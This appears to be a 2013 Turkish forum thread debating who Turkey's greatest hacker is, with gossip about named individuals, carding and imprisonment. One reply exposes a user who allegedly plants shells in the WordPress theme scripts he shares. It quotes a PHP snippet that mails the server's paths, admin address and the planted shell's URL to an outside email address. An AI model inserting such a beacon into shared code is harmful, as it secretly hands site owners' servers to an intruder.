Türkiye‘Nin En Büyük Hackeri Kim?
-
el muhammed
-
benim
-
kuralkan bunu yazdı
el muhammed
el_lamoş ?
her yazdığı pardon editlediği sikripte shell koyan elemanı mı diyosun? sonra hackleyen.
edit://
z��r�^$kime="indirelimhemen@gmail.com";
Daniel-Koo tarafından 17/Şub/13 20:42 tarihinde düzenlenmiştir
$baslik="WordPresS Tema Sw Avcisi V3.0";
$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn";
$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn";
$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn";
$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn";
$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn";
mail($kime, $baslik, $EL_MuHaMMeD); -
Arkadaşlar ek olarak "hacker" olarak değil de "bu işlere meraklı biri olacak" şekilde soruyorum. Amacım site heykleyip index atıp popi yapmak değil; cidden bu işlerin nasıl olduğu kodların nasıl yazıldığını öğrenmek istiyorum açıkçası. Virüsten tut programına kadar nasıl yapılıyor? Bu konuda sanal alemde yardımcı olan kişi sayısı neden az? Nerden başlamak lazım? Nasıl ilerleteceğiz? Bunların hepsi muamma..
Dentist tarafından 17/Şub/13 20:33 tarihinde düzenlenmiştir -
pcdoktor636 bunu yazdı
Gerçek olup olmadığı bile tartışmalı şahsiyet; Cha0.
http://ihsanaydin.net/category/onurlu-hirsizlar/page/3/
+1
-
1 kere heves ettim..sonra tövbe ettim
-
Hack içli dışlı olmuşmudur bilmem ama Cracking bilgisi vardı Asa The Zerotimer tabi bu işleri bırakmış
DeadSoul tarafından 17/Şub/13 21:12 tarihinde düzenlenmiştir -
kara murat
-
Türkiye'de nadir gördüğüm bir kişi var kendisi hiç küçük işlerler uğraşmadı her zaman üstün islerler ugrastı.
Çagatay (Cha0)yani ama suan iceride nedir ne degildiri durumu bilmiyorum .
-
UmuT38 bunu yazdı
Türkiye'de nadir gördüğüm bir kişi var kendisi hiç küçük işlerler uğraşmadı her zaman üstün islerler ugrastı.
Çagatay (Cha0)yani ama suan iceride nedir ne degildiri durumu bilmiyorum .
kendisini öve öve bitiremeyen birisi vardı, cc işleriyle içli dışlı. bir ara hapse girdi, sonra eğer yalan değilse, paşa bir tanıdığı sayesinde çıktı. sonra ne oldu bilmiyorum.